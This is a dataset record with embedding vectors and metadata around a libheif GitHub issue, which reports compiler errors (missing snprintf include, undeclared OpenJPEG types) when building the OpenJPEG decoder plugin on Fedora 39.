0.019929397851228714, -0.00034667825093492866, 0.01050465740263462, 0.0016362395836040378, -0.014137109741568565, 0.003906521946191788, -0.008013483136892319, 0.005489583592861891, -0.010087416507303715, -0.016329670324921608, 0.015061585232615471, -0.0055223084054887295, 0.01326990220695734, 0.0032765697687864304, -0.010660100728273392, -0.008308006450533867, -0.017262326553463936, -0.004855541046708822, -0.008892961777746677, -0.007174910511821508, 0.028846902772784233, -0.005211423151195049, -0.002108703600242734, -0.002752972999587655, -0.019782135263085365, -0.015045222826302052, -0.015274296514689922, -0.027276113629341125, 0.0047000981867313385, -0.006692219525575638, 0.03805893287062645, 0.049938030540943146, -0.0007634080247953534, 0.009531095623970032, 0.00028148433193564415, -0.010357396677136421, -0.014758880250155926, -0.005518218036741018, 0.013294446282088757, 0.013580787926912308, 0.01994575932621956, 0.018882203847169876, -0.0026813875883817673, 0.005501855630427599, -0.001068668905645609, -0.0016413527773693204, -0.01095462404191494, 0.01290993019938469, -0.02150018699467182, -0.001078895409591496, -0.0057513820938766, 0.019700324162840843, -0.00657768314704299, 0.015986060723662376, 0.008901143446564674, -0.01991303451359272, 0.005305506754666567, 0.042673125863075256, 0.004790091421455145, -0.006021361332386732, -0.0027652448043227196, 0.0028961440548300743, 0.010259222239255905, -0.018342245370149612, 0.02770153619349003, -0.0008907279116101563, 0.006814937572926283, -0.00849208328872919, 0.01614968478679657, 0.01626422069966793, 0.028928715735673904, -0.001547269057482481, 0.0006084765773266554, 0.019553061574697495, 0.022105596959590912, -0.010381939820945263, -0.031383074820041656, -0.0013028557877987623, -0.011044616810977459, 0.011969092302024364, 0.016215134412050247, 0.0030188618693500757, -0.011240965686738491, -0.019585786387324333, -0.008099385537207127, -0.015617906115949154, -0.002274372847750783, 0.00688038719817996, -0.014218921773135662, -0.020600255578756332, -0.011044616810977459, -0.009449283592402935, -0.011609119363129139, 0.0027897884137928486, 0.007023558020591736, -0.0032438449561595917, 0.013613512739539146, -0.03805893287062645, -0.006246344652026892, -0.005825012922286987, 0.008087113499641418, -0.0033890611957758665, -0.02578713558614254, -0.0008983977604657412, -0.00548549322411418, -0.026523442938923836, -0.00032060069497674704, -0.0014071660116314888, -0.013850768096745014, 0.00179065961856395, -0.0015554502606391907, 0.002182334428653121, 0.019373076036572456, -0.009252934716641903, 0.0019082643557339907, 0.021107489243149757, -0.01538065169006586, 0.00399037916213274, -0.005559124052524567, -0.0017845237161964178, 0.007620785851031542, 0.01562608778476715, -0.006307703442871571, -0.01371986884623766, 0.0063936058431863785, 0.019323989748954773, 0.001614763867110014, -0.007334443740546703, -0.0033849705941975117, 0.009342927485704422, -0.0035506398417055607, 0.02277645468711853, -0.0015339745441451669, 0.004315581638365984, 0.002640481572598219, -0.010357396677136421, 0.011110066436231136, 0.01852223090827465, -0.007543064188212156, 0.004953715018928051, -0.005113248713314533, 0.010234678164124489, -0.00603363336995244, -0.008328459225594997, 0.017082341015338898, -0.00663495110347867, 0.01451344508677721, 0.022383756935596466, -0.0005486515583470464, -0.007633057422935963, -0.019520336762070656, 0.01295083574950695, 0.004045602399855852, 0.0035731380339711905, 0.003517915029078722, 0.0087538817897439, -0.007678053807467222, 0.005178698338568211, 0.02390545979142189, 0.02439633198082447, 0.024789029732346535, -0.02153291180729866, 0.010570107027888298, -0.008434814400970936, 0.0032377089373767376, -0.0022477840539067984, -0.01272176206111908, 0.00798075832426548, 0.0038799329195171595, -0.010586469434201717, -0.011200059205293655, -0.004794181790202856, 0.002446178114041686, 0.01893129199743271, -0.04074236378073692, -0.0017630481161177158, 0.006283159833401442, 0.007436708547174931, 0.003996515180915594, -0.013809861615300179, 0.003757215104997158, -0.00178350112400949, -0.0028081960044801235, 0.009482008405029774, 0.005861828103661537, 0.010341034270823002, -0.014447995461523533, -0.013932579196989536, -0.014186196960508823, 0.023725472390651703, 0.003935155924409628, 0.060017265379428864, -0.010210135020315647, 0.0022007422521710396, 0.0159942414611578, -0.005060070659965277, -0.013867130503058434, 0.0020964317955076694, 0.006778122391551733, -0.009612907655537128, -0.014120747335255146, -0.01678781770169735, 0.004806453827768564, 0.015437919646501541, -0.010341034270823002, 0.00801757350564003, -0.003254071343690157, -0.017180515453219414, 0.020420270040631294, -0.021860159933567047, -0.012378152459859848, 0.010267402976751328, -0.005996817722916603, -0.004810544196516275, 0.011789105832576752, -0.002372547285631299, -0.0064672366715967655, 0.007624876219779253, -0.007383530959486961, 0.011846373789012432, -0.019896673038601875, 0.019716685637831688, 0.009506551548838615, 0.005624573212116957, 0.011020073667168617, 0.015936972573399544, 0.008250737562775612, -0.013114459812641144, 0.037437159568071365, -0.005015074275434017, 0.005465039983391762, 0.0029022798407822847, -0.012803574092686176, -0.008590257726609707, -0.010619194246828556, 0.011805468238890171, 0.001973713980987668, 0.00025221097166649997, -0.01574062369763851, 0.012500870041549206, -0.013237177394330502, -0.02624528296291828, -0.0005348458071239293, 0.006021361332386732, -0.013237177394330502, 0.02491992898285389, 0.0049332622438669205, 0.016648737713694572, -0.006426330655813217, -0.0031436251010745764, -0.019585786387324333, -0.013327171094715595, -0.027603361755609512, -0.005992727354168892, 0.00259343977086246, -0.003186576534062624, 0.0047491854056715965, 0.01916036568582058, 0.019716685637831688, -0.011625481769442558, 0.016665099188685417, 0.01776956208050251, -0.028356030583381653, -0.007678053807467222, -0.004098779987543821, -0.01630512624979019, -0.01272176206111908, 0.021238388493657112, -0.011650025844573975, -0.01652601920068264, 0.02262919209897518, -0.005841375328600407, -0.009048404172062874, 0.0025709413457661867, 0.004880084190517664, 0.013858948834240437, -0.025770772248506546, -0.016395119950175285, -0.0025852585677057505, -0.008369364775717258, 0.035964544862508774, 0.009850162081420422, 0.011077341623604298, -0.015691537410020828, -0.004728732164949179, -0.012942655012011528, -0.003472918411716819, 0.0034340578131377697, 0.008573895320296288, 0.014112565666437149, 0.0022334670647978783, -0.011568213813006878, 0.008721156977117062, -0.014562532305717468, 0.008107567206025124, -0.029746834188699722, -0.019405800849199295, -0.01577334851026535, -0.019814860075712204, -0.020911140367388725, 0.012435420416295528, -0.009833799675107002, 0.009866524487733841, -0.015323382802307606, 0.012263615615665913, -0.004006741568446159, -0.003796075703576207, -0.012009997852146626, 0.005706385243684053, -0.0009439056739211082, 0.007792590651661158, 0.002759109018370509, 0.0087538817897439, 0.00826300960034132, 0.016542382538318634, 0.010030148550868034, 0.008729337714612484, 0.0024829935282468796, 0.02920687571167946, 0.011797287501394749, -0.01912764087319374, 0.024821754544973373, -0.012009997852146626, 0.005988636519759893, 0.00907294824719429, 0.017491400241851807, 0.015347926877439022, -0.0005307552055455744, -0.005305506754666567, 0.01189546100795269, -0.012222709134221077, -0.03131762519478798, 0.024330882355570793, -0.010283765383064747, -0.0000586425703659188, -0.007948033511638641, 0.01686962880194187, -0.002045299392193556, -0.012590862810611725, -0.012746306136250496, -0.00497825862839818, 0.014235284179449081, -0.017475038766860962, 0.0338701568543911, -0.0034136048052459955, -0.015061585232615471, 0.009948336519300938, 0.004638738930225372, 0.018849479034543037, 0.0028347850311547518, -0.005501855630427599, 0.015118853189051151, -0.015192484483122826, -0.015356107614934444, 0.0021271114237606525, -0.014554350636899471, 0.01739322580397129, 0.003587455255910754, -0.006872205995023251, 0.00019161899399477988, -0.005027345847338438, -0.008950230665504932, -0.009064766578376293, -0.002255965257063508, -0.0061604417860507965, 0.014071660116314888, 0.008852056227624416, 0.01313900388777256, 0.009228390641510487, 0.00020759788458235562, 0.011584576219320297, 0.0031927123200148344, 0.02176198549568653, -0.037437159568071365, -0.015004316344857216, 0.015356107614934444, 0.0013897810131311417, -0.01626422069966793, -0.007780319079756737, 0.005992727354168892, 0.021631086245179176, 0.008328459225594997, -0.0023807284887880087, 0.0071626384742558, -0.0056450264528393745, -0.01095462404191494, 0.012754486873745918, 0.010578288696706295, 0.011232784017920494, 0.016288764774799347, -0.023578211665153503, -0.0018867887556552887, -0.013368076644837856, 0.006487689912319183, 0.039400648325681686 ]
null
null
null
null
null
null
null
null
null
[ "strukturag", "libheif" ]
I'm trying to compile the libheif library from source on my fedora 39 machine. On both the latest tagged release and the master branch I run into this error: I'm not sure what I'm doing wrong or how to fix it? ``` [ 87%] Building CXX object libheif/plugins/CMakeFiles/heif-j2kdec.dir/decoder_openjpeg.cc.o /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc: In function ‘const char* openjpeg_plugin_name()’: /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:46:3: error: ‘snprintf’ was not declared in this scope 46 | snprintf(plugin_name, MAX_PLUGIN_NAME_LENGTH, "OpenJPEG %s", opj_version()); | ^~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:30:1: note: ‘snprintf’ is defined in header ‘<cstdio>’; did you forget to ‘#include <cstdio>’? 29 | #include <cassert> +++ |+#include <cstdio> 30 | /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc: At global scope: /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:117:8: error: ‘OPJ_SIZE_T’ does not name a type 117 | static OPJ_SIZE_T opj_memory_stream_read(void* p_buffer, OPJ_SIZE_T p_nb_bytes, void* p_user_data) | ^~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:149:8: error: ‘OPJ_SIZE_T’ does not name a type 149 | static OPJ_SIZE_T opj_memory_stream_write(void* p_buffer, OPJ_SIZE_T p_nb_bytes, void* p_user_data) | ^~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:158:8: error: ‘OPJ_OFF_T’ does not name a type 158 | static OPJ_OFF_T opj_memory_stream_skip(OPJ_OFF_T p_nb_bytes, void* p_user_data) | ^~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:191:8: error: ‘OPJ_BOOL’ does not name a type 191 | static OPJ_BOOL opj_memory_stream_seek(OPJ_OFF_T p_nb_bytes, void* p_user_data) | ^~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:220:1: error: ‘opj_stream_t’ does not name a type 220 | opj_stream_t* opj_stream_create_default_memory_stream(openjpeg_decoder* p_decoder, OPJ_BOOL p_is_read_stream) | ^~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc: In function ‘heif_error openjpeg_decode_image(void*, heif_image**)’: /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:256:3: error: ‘OPJ_BOOL’ was not declared in this scope 256 | OPJ_BOOL success; | ^~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:258:3: error: ‘opj_codec_t’ was not declared in this scope; did you mean ‘opj_poc_t’? 258 | opj_codec_t* l_codec; | ^~~~~~~~~~~ | opj_poc_t /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:258:16: error: ‘l_codec’ was not declared in this scope 258 | opj_codec_t* l_codec; | ^~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:262:35: error: ‘OPJ_CODEC_J2K’ was not declared in this scope; did you mean ‘CODEC_J2K’? 262 | l_codec = opj_create_decompress(OPJ_CODEC_J2K); | ^~~~~~~~~~~~~ | CODEC_J2K /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:263:3: error: ‘success’ was not declared in this scope 263 | success = opj_setup_decoder(l_codec, &decompression_parameters); | ^~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:272:11: error: expected ‘;’ before ‘is_read_stream’ 272 | OPJ_BOOL is_read_stream = true; | ^~~~~~~~~~~~~~~ | ; /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:273:3: error: ‘opj_stream_t’ was not declared in this scope 273 | opj_stream_t* stream = opj_stream_create_default_memory_stream(decoder, is_read_stream); | ^~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:273:17: error: ‘stream’ was not declared in this scope; did you mean ‘strcat’? 273 | opj_stream_t* stream = opj_stream_create_default_memory_stream(decoder, is_read_stream); | ^~~~~~ | strcat /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:273:75: error: ‘is_read_stream’ was not declared in this scope 273 | opj_stream_t* stream = opj_stream_create_default_memory_stream(decoder, is_read_stream); | ^~~~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:273:26: error: ‘opj_stream_create_default_memory_stream’ was not declared in this scope 273 | opj_stream_t* stream = opj_stream_create_default_memory_stream(decoder, is_read_stream); | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:278:13: error: ‘opj_read_header’ was not declared in this scope 278 | success = opj_read_header(stream, l_codec, &image); | ^~~~~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:288:35: error: ‘OPJ_CLRSPC_UNSPECIFIED’ was not declared in this scope; did you mean ‘CLRSPC_UNSPECIFIED’? 288 | else if ((image->color_space != OPJ_CLRSPC_UNSPECIFIED) && (image->color_space != OPJ_CLRSPC_SRGB)) { | ^~~~~~~~~~~~~~~~~~~~~~ | CLRSPC_UNSPECIFIED /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:288:85: error: ‘OPJ_CLRSPC_SRGB’ was not declared in this scope; did you mean ‘CLRSPC_SRGB’? 288 | else if ((image->color_space != OPJ_CLRSPC_UNSPECIFIED) && (image->color_space != OPJ_CLRSPC_SRGB)) { | ^~~~~~~~~~~~~~~ | CLRSPC_SRGB /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:306:13: error: ‘opj_end_decompress’ was not declared in this scope; did you mean ‘opj_create_decompress’? 306 | success = opj_end_decompress(l_codec, stream); | ^~~~~~~~~~~~~~~~~~ | opj_create_decompress /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:314:3: error: ‘opj_stream_destroy’ was not declared in this scope; did you mean ‘opj_image_destroy’? 314 | opj_stream_destroy(stream); | ^~~~~~~~~~~~~~~~~~ | opj_image_destroy /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:359:24: error: comparison of integer expressions of different signedness: ‘size_t’ {aka ‘long unsigned int’} and ‘int’ [-Werror=sign-compare] 359 | for (size_t c = 0; c < image->numcomps; c++) { | ~~^~~~~~~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc: At global scope: /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:212:13: error: ‘void opj_memory_stream_do_nothing(void*)’ defined but not used [-Werror=unused-function] 212 | static void opj_memory_stream_do_nothing(void* p_user_data) | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~ cc1plus: all warnings being treated as errors make[2]: *** [libheif/plugins/CMakeFiles/heif-j2kdec.dir/build.make:76: libheif/plugins/CMakeFiles/heif-j2kdec.dir/decoder_openjpeg.cc.o] Error 1 make[1]: *** [CMakeFiles/Makefile2:563: libheif/plugins/CMakeFiles/heif-j2kdec.dir/all] Error 2 make: *** [Makefile:156: all] Error 2 ```
Cannot compile OpenJPEG decoder plugin
https://api.github.com/repos/strukturag/libheif/issues/1134/comments
8
2024-02-28T10:18:30
2024-06-11T09:47:15Z
https://github.com/strukturag/libheif/issues/1134
2,158,602,933
1,134
false
This is a GitHub Issue repo:libheif owner:strukturag Title : Cannot compile OpenJPEG decoder plugin Issue date: --- start body --- I'm trying to compile the libheif library from source on my fedora 39 machine. On both the latest tagged release and the master branch I run into this error: I'm not sure what I'm doing wrong or how to fix it? ``` [ 87%] Building CXX object libheif/plugins/CMakeFiles/heif-j2kdec.dir/decoder_openjpeg.cc.o /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc: In function ‘const char* openjpeg_plugin_name()’: /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:46:3: error: ‘snprintf’ was not declared in this scope 46 | snprintf(plugin_name, MAX_PLUGIN_NAME_LENGTH, "OpenJPEG %s", opj_version()); | ^~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:30:1: note: ‘snprintf’ is defined in header ‘<cstdio>’; did you forget to ‘#include <cstdio>’? 29 | #include <cassert> +++ |+#include <cstdio> 30 | /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc: At global scope: /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:117:8: error: ‘OPJ_SIZE_T’ does not name a type 117 | static OPJ_SIZE_T opj_memory_stream_read(void* p_buffer, OPJ_SIZE_T p_nb_bytes, void* p_user_data) | ^~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:149:8: error: ‘OPJ_SIZE_T’ does not name a type 149 | static OPJ_SIZE_T opj_memory_stream_write(void* p_buffer, OPJ_SIZE_T p_nb_bytes, void* p_user_data) | ^~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:158:8: error: ‘OPJ_OFF_T’ does not name a type 158 | static OPJ_OFF_T opj_memory_stream_skip(OPJ_OFF_T p_nb_bytes, void* p_user_data) | ^~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:191:8: error: ‘OPJ_BOOL’ does not name a type 191 | static OPJ_BOOL opj_memory_stream_seek(OPJ_OFF_T p_nb_bytes, void* p_user_data) | ^~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:220:1: error: ‘opj_stream_t’ does not name a type 220 | opj_stream_t* opj_stream_create_default_memory_stream(openjpeg_decoder* p_decoder, OPJ_BOOL p_is_read_stream) | ^~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc: In function ‘heif_error openjpeg_decode_image(void*, heif_image**)’: /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:256:3: error: ‘OPJ_BOOL’ was not declared in this scope 256 | OPJ_BOOL success; | ^~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:258:3: error: ‘opj_codec_t’ was not declared in this scope; did you mean ‘opj_poc_t’? 258 | opj_codec_t* l_codec; | ^~~~~~~~~~~ | opj_poc_t /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:258:16: error: ‘l_codec’ was not declared in this scope 258 | opj_codec_t* l_codec; | ^~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:262:35: error: ‘OPJ_CODEC_J2K’ was not declared in this scope; did you mean ‘CODEC_J2K’? 262 | l_codec = opj_create_decompress(OPJ_CODEC_J2K); | ^~~~~~~~~~~~~ | CODEC_J2K /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:263:3: error: ‘success’ was not declared in this scope 263 | success = opj_setup_decoder(l_codec, &decompression_parameters); | ^~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:272:11: error: expected ‘;’ before ‘is_read_stream’ 272 | OPJ_BOOL is_read_stream = true; | ^~~~~~~~~~~~~~~ | ; /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:273:3: error: ‘opj_stream_t’ was not declared in this scope 273 | opj_stream_t* stream = opj_stream_create_default_memory_stream(decoder, is_read_stream); | ^~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:273:17: error: ‘stream’ was not declared in this scope; did you mean ‘strcat’? 273 | opj_stream_t* stream = opj_stream_create_default_memory_stream(decoder, is_read_stream); | ^~~~~~ | strcat /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:273:75: error: ‘is_read_stream’ was not declared in this scope 273 | opj_stream_t* stream = opj_stream_create_default_memory_stream(decoder, is_read_stream); | ^~~~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:273:26: error: ‘opj_stream_create_default_memory_stream’ was not declared in this scope 273 | opj_stream_t* stream = opj_stream_create_default_memory_stream(decoder, is_read_stream); | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:278:13: error: ‘opj_read_header’ was not declared in this scope 278 | success = opj_read_header(stream, l_codec, &image); | ^~~~~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:288:35: error: ‘OPJ_CLRSPC_UNSPECIFIED’ was not declared in this scope; did you mean ‘CLRSPC_UNSPECIFIED’? 288 | else if ((image->color_space != OPJ_CLRSPC_UNSPECIFIED) && (image->color_space != OPJ_CLRSPC_SRGB)) { | ^~~~~~~~~~~~~~~~~~~~~~ | CLRSPC_UNSPECIFIED /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:288:85: error: ‘OPJ_CLRSPC_SRGB’ was not declared in this scope; did you mean ‘CLRSPC_SRGB’? 288 | else if ((image->color_space != OPJ_CLRSPC_UNSPECIFIED) && (image->color_space != OPJ_CLRSPC_SRGB)) { | ^~~~~~~~~~~~~~~ | CLRSPC_SRGB /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:306:13: error: ‘opj_end_decompress’ was not declared in this scope; did you mean ‘opj_create_decompress’? 306 | success = opj_end_decompress(l_codec, stream); | ^~~~~~~~~~~~~~~~~~ | opj_create_decompress /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:314:3: error: ‘opj_stream_destroy’ was not declared in this scope; did you mean ‘opj_image_destroy’? 314 | opj_stream_destroy(stream); | ^~~~~~~~~~~~~~~~~~ | opj_image_destroy /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:359:24: error: comparison of integer expressions of different signedness: ‘size_t’ {aka ‘long unsigned int’} and ‘int’ [-Werror=sign-compare] 359 | for (size_t c = 0; c < image->numcomps; c++) { | ~~^~~~~~~~~~~~~~~~~ /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc: At global scope: /home/username/tmp/libheif-1.17.6/libheif/plugins/decoder_openjpeg.cc:212:13: error: ‘void opj_memory_stream_do_nothing(void*)’ defined but not used [-Werror=unused-function] 212 | static void opj_memory_stream_do_nothing(void* p_user_data) | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~ cc1plus: all warnings being treated as errors make[2]: *** [libheif/plugins/CMakeFiles/heif-j2kdec.dir/build.make:76: libheif/plugins/CMakeFiles/heif-j2kdec.dir/decoder_openjpeg.cc.o] Error 1 make[1]: *** [CMakeFiles/Makefile2:563: libheif/plugins/CMakeFiles/heif-j2kdec.dir/all] Error 2 make: *** [Makefile:156: all] Error 2 ``` --- end body ---
7,896
[ -0.017320776358246803, 0.004796291701495647, -0.013584480620920658, 0.01138179562985897, 0.03103305771946907, -0.024868546053767204, 0.015711989253759384, 0.0174260251224041, -0.006333660800009966, 0.040264792740345, -0.014892560429871082, -0.027003571391105652, -0.0032645605970174074, 0.012569591403007507, -0.02262827195227146, 0.03996408358216286, -0.016674254089593887, 0.014253555797040462, -0.025364713743329048, -0.004931610077619553, 0.030251218006014824, -0.018598785623908043, 0.02112473174929619, 0.025094076991081238, 0.012411720119416714, 0.013975401408970356, -0.003961827140301466, 0.02631194330751896, -0.04306137561798096, 0.007634222507476807, 0.022538060322403908, 0.010592437349259853, -0.006559191737323999, 0.004826362244784832, 0.08437864482402802, -0.0000035202504022890935, 0.03223589062690735, 0.023380041122436523, -0.01103598065674305, 0.005495437420904636, -0.015388728119432926, -0.03770877420902252, -0.009795560501515865, 0.00643139099702239, -0.03235617280006409, 0.029033351689577103, 0.025860881432890892, 0.002871760865673423, -0.04306137561798096, 0.01343412697315216, -0.0007367344223894179, -0.01756134256720543, -0.0013860756298527122, -0.03918224200606346, 0.0023793515283614397, -0.04775242134928703, 0.020102325826883316, 0.029168669134378433, 0.004104663152247667, 0.04357257857918739, -0.023665715008974075, 0.017215529456734657, -0.0022346358746290207, 0.01823793537914753, 0.020357927307486534, 0.01315597165375948, -0.020763883367180824, 0.040415145456790924, -0.01386263594031334, -0.012374131008982658, -0.00881826039403677, -0.041106775403022766, 0.01817779429256916, 0.03701714798808098, 0.030461713671684265, -0.03539332374930382, 0.026612652465701103, 0.0005459728417918086, -0.023199617862701416, 0.0336792878806591, -0.03259674087166786, 0.0018643891671672463, -0.06254725158214569, -0.02106459066271782, 0.003647963050752878, -0.0016012697014957666, 0.009600101038813591, -0.036385659128427505, -0.020703740417957306, 0.005506713874638081, -0.019485874101519585, 0.041166916489601135, 0.02303422801196575, -0.0018540523014962673, -0.008487481623888016, 0.03963330388069153, -0.027364421635866165, -0.03340865299105644, -0.04384321719408035, -0.04913567751646042, -0.03683672100305557, -0.022252386435866356, 0.012659803964197636, 0.03686679154634476, 0.002712009707465768, 0.026567546650767326, 0.02375592663884163, -0.024206988513469696, 0.011058534495532513, 0.08449892699718475, -0.0116148442029953, 0.013855118304491043, -0.01457681693136692, -0.01208094134926796, -0.029063422232866287, 0.01299058273434639, 0.0025879675522446632, 0.019335519522428513, -0.0015702592208981514, 0.005228559020906687, 0.006863658782094717, -0.027048679068684578, 0.008870883844792843, -0.016268299892544746, -0.009314428083598614, -0.015005325898528099, 0.007893582805991173, -0.047481782734394073, 0.01898970641195774, -0.001808006432838738, -0.042850881814956665, -0.027229104191064835, 0.014020507223904133, -0.025951094925403595, 0.00334161682985723, -0.015997661277651787, 0.002593606011942029, 0.06705787032842636, -0.024402448907494545, 0.02181635983288288, -0.014418945647776127, -0.031273625791072845, 0.02685321867465973, -0.02168104238808155, -0.006480256095528603, -0.00106469402089715, -0.019801616668701172, 0.04224946349859238, 0.027830518782138824, -0.012479378841817379, -0.019816651940345764, 0.018929563462734222, 0.030942846089601517, -0.020297786220908165, 0.051330845803022385, -0.004773738328367472, 0.007863512262701988, 0.03506254404783249, 0.014817383140325546, -0.0007433124119415879, -0.05701422318816185, -0.041918687522411346, 0.027214067056775093, -0.008472446352243423, -0.005690897814929485, -0.01595255546271801, -0.034491200000047684, -0.0032645605970174074, -0.019681334495544434, 0.02948441356420517, 0.0059878467582166195, 0.04441456124186516, 0.01074279099702835, 0.004397853277623653, -0.05905903875827789, -0.02551506832242012, 0.01127654779702425, 0.025905989110469818, -0.009539959020912647, -0.0433620847761631, 0.001212228904478252, 0.008908472955226898, 0.021350262686610222, 0.01891452819108963, 0.04706079140305519, -0.006138200871646404, 0.014997808262705803, -0.029499448835849762, 0.03358907625079155, -0.008374716155230999, -0.0050481343641877174, 0.00666443957015872, 0.012073423713445663, -0.015200786292552948, 0.038881536573171616, -0.013697246089577675, -0.010630025528371334, -0.014088166877627373, -0.012509450316429138, 0.002621797379106283, 0.011096122674643993, -0.009750454686582088, -0.03864096850156784, -0.004702320322394371, -0.005029340274631977, 0.020342892035841942, 0.024688120931386948, 0.03749828040599823, 0.03467162325978279, -0.039543092250823975, 0.0006188005208969116, -0.017185458913445473, 0.011261512525379658, -0.04023472219705582, 0.015636812895536423, 0.01174264494329691, -0.00976548995822668, 0.028988244011998177, -0.0489853210747242, 0.005427778232842684, 0.018418360501527786, -0.047692276537418365, 0.020583458244800568, -0.0038490614388138056, -0.02619166113436222, -0.020102325826883316, -0.011020945385098457, -0.025800740346312523, -0.011051016859710217, 0.0323261022567749, 0.0516916923224926, -0.001057176268659532, 0.00999853853136301, 0.005938981659710407, 0.03313801437616348, -0.0102616585791111, 0.015967590734362602, -0.00520224729552865, -0.058186985552310944, 0.004559483844786882, 0.03364921733736992, 0.022568130865693092, -0.024116776883602142, -0.020628564059734344, 0.0016350994119420648, 0.05376657843589783, -0.03455134108662605, 0.0035333181731402874, -0.030341429635882378, 0.008404786698520184, -0.003805834800004959, 0.00915655680000782, 0.00026264958432875574, -0.004649696405977011, -0.03346879407763481, 0.03855075687170029, 0.00024080128059722483, 0.02987533248960972, 0.002584208734333515, -0.016944892704486847, 0.03217574954032898, 0.02955958992242813, -0.03831018880009651, -0.006863658782094717, -0.025394784286618233, 0.005984087940305471, 0.01602773368358612, 0.004285087808966637, 0.008592729456722736, -0.04766220599412918, 0.047090861946344376, -0.01602773368358612, -0.002892434364184737, 0.02470315620303154, -0.006258483976125717, 0.012223777361214161, -0.009028756059706211, -0.020087290555238724, 0.03749828040599823, 0.04306137561798096, 0.018298078328371048, -0.0029431788716465235, -0.0013926535611972213, 0.031604405492544174, 0.0025184289552271366, -0.01723056472837925, -0.023951387032866478, -0.03385971486568451, -0.009607618674635887, -0.002567294053733349, -0.01144193671643734, 0.0327170230448246, -0.054097358137369156, 0.0244926605373621, 0.003664877964183688, 0.009675277397036552, -0.013118383474647999, -0.023996492847800255, -0.003756969701498747, 0.03641572967171669, -0.02874767780303955, -0.02261323668062687, 0.005961534567177296, -0.020448138937354088, -0.03791927173733711, 0.004262534901499748, -0.02154572308063507, 0.031063130125403404, -0.0011238958686590195, 0.00022306419850792736, 0.040836136788129807, -0.0020936790388077497, -0.007634222507476807, -0.02168104238808155, -0.033889785408973694, 0.01953097991645336, 0.01453922875225544, 0.007517698220908642, -0.007810888346284628, 0.0030766180716454983, -0.019140059128403664, 0.022162174805998802, -0.04080606624484062, 0.005187212023884058, 0.02886796183884144, -0.027439597994089127, 